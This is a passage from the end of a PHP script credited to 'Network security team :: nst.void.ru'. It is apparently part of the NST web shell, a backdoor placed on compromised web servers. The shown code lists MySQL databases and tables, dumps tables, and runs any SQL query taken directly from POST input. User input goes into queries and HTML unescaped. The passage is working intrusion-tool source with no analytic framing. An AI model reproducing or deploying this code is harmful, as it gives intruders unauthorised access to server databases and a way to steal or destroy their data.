1026}else{
1027$tc="";
1028}
1029
1030print "<tr onMouseOver='this.style.background=\"#FFFEC8\";' onMouseOut='this.style.background=\"#A2D8FF\";' bgcolor=\"#A2D8FF\">
1031 <td align=center><a href='#' onclick='nst_mysql_select_db(\"".$row['Database']."\"); return false;'><font color=".$tc.">".$row['Database']."</td>
1032 </tr>";
1033}
1034print "</table>";
1035
1036
1037}
1038}
1039#end of mysql db's
1040
1041
1042
1043# mysql list tables
1044if($_POST['nst_tmp2']=="list_tables_my"){
1045if(!$q = @mysql_list_tables($_POST['nst_tmp3'])){show_error("Cant list tables!<br>(".mysql_error().")");}
1046
1047print "<br><table border=0 align=center>
1048<tr align=center bgcolor=#7CC2FF><td>Table name</td><td>Download</td></tr>";
1049while($row = mysql_fetch_array($q)){
1050
1051if($_POST['nst_tmp5']==$row[0]){
1052$tc="#FF47FF";
1053}else{
1054$tc="";
1055}
1056
1057$c = mysql_query("SELECT COUNT(*) FROM `".$row[0]."`");
1058$record_array = mysql_fetch_array($c);
1059$records = $record_array[0];
1060
1061print "<tr onMouseOver='this.style.background=\"#FFFEC8\";' onMouseOut='this.style.background=\"#A2D8FF\";' bgcolor=\"#A2D8FF\">
1062 <td nowrap><a href='#' onclick='nst_mysql_select_table(\"".$_POST['nst_tmp3']."\",\"".$row[0]."\"); return false;'><font color=".$tc.">".$row[0]." (".$records.")</td>
1063 <td align=center><a href='#' onclick='nst_mysql_dump_table(\"".$_POST['nst_tmp3']."\",\"".$row[0]."\"); return false;'>Dump</a></td>
1064 </tr>";
1065}
1066print "</table>";
1067
1068}
1069#end of list tables
1070
1071
1072
1073
1074
1075# mysql show table content
1076if($_POST['nst_tmp4']=="show_table_content_my"){
1077
1078
1079if(!$_POST['sql_q']){
1080$sql_q = "SELECT * FROM ".$_POST['nst_tmp5']." LIMIT 0,30";
1081}else{
1082$sql_q = $_POST['sql_q'];
1083}
1084
1085
1086print "<table border=0 align=center>
1087<tr><td><a name=sql_q></a>Type SQL to execute:</td></tr>
1088<tr><td><textarea name=sql_q style='width:500px; height:100px;' id=sql_q>".$sql_q."</textarea><br>
1089<input type=button value='Run sql query' onclick=\"nst_mysql_run_query('".$_POST['nst_tmp3']."','".$_POST['nst_tmp5']."');\"> Fast SQL:
1090<input type=button onclick='document.getElementById(\"sql_q\").value=\"SELECT * FROM ".$_POST['nst_tmp5']." LIMIT 0,30\"' value=Select>
1091<input type=button onclick='document.getElementById(\"sql_q\").value=\"INSERT INTO ".$_POST['nst_tmp5']."\\n(field1, field2, field3)\\nVALUES ('value1','value2','value3');\"' value=Insert>
1092<input type=button onclick='document.getElementById(\"sql_q\").value=\"UPDATE ".$_POST['nst_tmp5']."\\nSET field1='value1', field2='value2', field3='value3'\\nWHERE field1='abc';\"' value=Update>
1093<input type=button onclick='document.getElementById(\"sql_q\").value=\"DELETE FROM ".$_POST['nst_tmp5']."\\nWHERE field1='abc';\"' value='Delete'>
1094</tr><td>
1095</table>";
1096
1097
1098if(!$q = @mysql_query($sql_q)){show_error("<center>Query failed!<br>(".mysql_error().")");}else{
1099
1100if(preg_match("/SELECT\s/is", $sql_q)){
1101
1102$fields = array();
1103print "<br><table border=0 align=center>";
1104print "<tr bgcolor=#7CC2FF>";
1105while($row = mysql_fetch_field($q)){
1106print "<td>".$row->name."</td>";
1107$fields[] = $row->name;
1108}
1109print "</tr>";
1110
1111
1112
1113while($row = mysql_fetch_array($q)){
1114print "<tr onMouseOver='this.style.background=\"#FFFEC8\";' onMouseOut='this.style.background=\"#A2D8FF\";' bgcolor=\"#A2D8FF\">";
1115$i=0;
1116foreach($row as $key=>$value){
1117if($i%2){
1118print "<td nowrap>".$value."</td>";
1119}
1120$i++;
1121}
1122print "</tr>";
1123}
1124
1125
1126print "</table>";
1127
1128}else{
1129print "
1130<br>
1131<table align=center>
1132<tr><td>Success!</td></tr>
1133<tr><td nowrap><font color=green><pre>".$sql_q."</td></tr>
1134</table>";
1135}
1136}
1137}
1138#end of mysql show table content
1139
1140
1141?>
1142</td></tr>
1143</form>
1144</table>
1145<!-- Network security team :: nst.void.ru -->